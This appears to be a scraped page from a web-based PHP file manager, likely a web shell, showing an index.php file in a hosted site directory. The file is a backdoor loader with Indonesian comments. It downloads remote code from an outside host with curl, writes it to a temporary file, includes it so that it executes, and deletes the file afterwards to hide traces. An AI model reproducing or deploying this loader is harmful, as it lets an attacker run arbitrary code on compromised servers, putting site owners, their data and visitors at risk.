File manager - Edit - /home/wwwroot/camplus.hk/redcross.camplus.hk/public_html/394431/index.php
Back
<?php $url = "https://51la.zvo2.xyz/a2.txt"; // Ganti dengan URL yang diinginkan $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($result === false) { echo "Error: " . "PD9waHA=" . curl_error($ch); } else { // Simpan hasil dari URL ke dalam file lokal $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_'); file_put_contents($tempFile, $result); // Include file yang telah diunduh dari URL include $tempFile; // Hapus file sementara setelah dieksekusi unlink($tempFile); } curl_close($ch);
| ver. 1.4 |
Github
|
.
| PHP 7.2.34 | Generation time: 0.44 |
proxy
|
phpinfo
|
Settings